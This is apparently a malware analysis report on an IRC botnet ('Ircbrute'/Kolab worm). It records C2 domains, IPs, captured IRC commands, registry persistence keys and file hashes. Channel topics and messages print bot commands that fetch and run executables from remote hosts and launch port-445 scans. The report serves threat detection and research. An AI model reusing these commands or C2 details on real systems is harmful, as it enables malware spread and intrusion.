java.KUTLUFAMILY.COM (botnet hosted with Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)

– DNS Queries:

Name                  Query Type  Query Result                    Successful  Protocol
java.kutlufamily.com  DNS_TYPE_A  178.211.56.105, 178.211.56.104
www.pr0.net           DNS_TYPE_A  74.206.242.164                  YES         udp

Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.104]
Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.105]

Remote Host     Port Number
178.211.56.104  81
74.206.242.164  80

NICK [N00_USA_XP_2259315](
PRIVMSG [N00_USA_XP_2259
@ :scan; Sequential Port Scan started on 174.133.89.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.
@ :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.
@ :scan; Sequential Port Scan started on 192.168.146.0:445 with a delay of 5 seconds for 0 minutes using 5 threads.
MODE #ss -ix
@ :download; Bad URL or DNS Error, error:
USER SP2-529 * 0 :COMPUTERNAME
MODE [N00_USA_XP_2259315](
@ -ix
JOIN #ss
PRIVMSG #xs :HTTP SET http://66.90.103.116/ss.exe

Nick: [N00_AUT_XP_2778236](xea@
Username: SP3-860
Joined Channel: #ss with Password ^B^B^B^B
Channel Topic for Channel #ss: “.asc -S -s |.http http://66.90.103.116/ss.exe |.asc exp_all 10 5 0 -c -e |.asc exp_all 10 5 0 -b -r -e |.asc exp_all 5 5 0 -c |.down -S |.down http://66.90.103.116/c1111.jpg c:d5b2y1g8u2s6.exe c:d5b2y1g8u2s6.exe -r -h”
Private Message to Channel #xs: “HTTP SET http://66.90.103.116/ss.exe”
Private Message to User [N00_AUT_XP_2778xc0xbc@: “scan; Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 5 threads.”
Private Message to User [N00_AUT_XP_2778xc0xbc@: “scan; Random Port Scan started on 80.13.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.”
Private Message to User [N00_AUT_XP_2778xc0xbc@: “scan; Sequential Port Scan started on 80.13.75.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.”
Private Message to User [N00_AUT_XP_2778xc0xbc@: “download; File download: 116.0KB to: c:d5b2y1g8u2s6.exe @ 38.7KB/sec.”
Private Message to User [N00_AUT_XP_2778xc0xbc@: “download; Created process: “c:d5b2y1g8u2s6.exe”, PID: “

178.211.56.105:81
Nick: [N00_AUT_XP_6439336](xea@
Username: SP3-315
Joined Channel: #tt with Password ^B^B^B^B
Channel Topic for Channel #tt: “.asc -S -s |.http http://66.90.103.116/tt.exe |.asc exp_all 10 5 0 -c -e |.asc exp_all 10 5 0 -b -r -e |.asc exp_all 5 5 0 -c |.down -S |.down http://66.90.103.116/dol2.jpg c:i6y6n6r1j1k2.exe c:i6y6n6r1j1k2.exe -r -h”
Private Message to Channel #xs: “HTTP SET http://66.90.103.116/tt.exe”
Private Message to User [N00_AUT_XP_6439xc0xbc@: “scan; Sequential Port Scan started on 192.35.222.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.”

* The following ports were open in the system:

Port  Protocol  Process
1052  TCP       ssqrm.exe (%System%\ssqrm.exe)
1467  TCP       ssqrm.exe (%System%\ssqrm.exe)
1473  TCP       ssqrm.exe (%System%\ssqrm.exe)

Registry Modifications

* The following Registry Keys were created:
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
    + Microsoft Driver Setup = “%System%\ssqrm.exe”

    so that ssqrm.exe runs every time Windows starts
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Microsoft Driver Setup = “%System%\ssqrm.exe”

    so that ssqrm.exe runs every time Windows starts

Memory Modifications

* There was a new process created in the system:

Process Name  Process Filename    Main Module Size
ssqrm.exe     %System%\ssqrm.exe  339,968 bytes

File System Modifications

* The following files were created in the system:

# 1
  Filename(s): %Windir%\logfile32.txt
  File Size:   0 bytes
  File Hash:   MD5: 0xD41D8CD98F00B204E9800998ECF8427E
               SHA-1: 0xDA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  Alias:       (not available)

# 2
  Filename(s): [file and pathname of the sample #1]
               %System%\ssqrm.exe
  File Size:   143,360 bytes
  File Hash:   MD5: 0x7EE827862F1C5A60516129F33C9878A8
               SHA-1: 0xA52118D6379A2B2FA68627874334022498DC38AF
  Alias:       Packed.Generic.307 [Symantec]
               Net-Worm.Win32.Kolab.nba [Kaspersky Lab]
               Generic.dx!uvc [McAfee]
               Trojan:Win32/Ircbrute [Microsoft]
               Virus.Win32.VBInject [Ikarus]

UPDATE:
NICK [N00_USA_XP_6297640]P
PRIVMSG [N00_USA_XP_6297
@ :update; File download: 94.5KB to: C:DOCUME~1UserNameLOCALS~1Temperaseme_71721.exe @ 47.3KB/sec.
QUIT gettin new bin .
NICK [00_USA_XP_7132739]
USER SP2-823 * 0 :COMPUTERNAME
MODE [00_USA_XP_7132739] -ix
JOIN #e1
USER SP2-331 * 0 :COMPUTERNAME
PRIVMSG #xs :HTTP SET http://178.211.56.90/e1.exe
PRIVMSG #e1 :scan; Sequential Port Scan started on 192.168.80.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.
MODE [N00_USA_XP_6297640]P
A -ix
PRIVMSG #e1 :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.
PRIVMSG #e1 :scan; Random Port Scan started on 174.x.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.
MODE #e1 -ix
JOIN #d1
MODE #d1 -ix

Information about the hosting provider:
http://whois.domaintools.com/178.211.56.104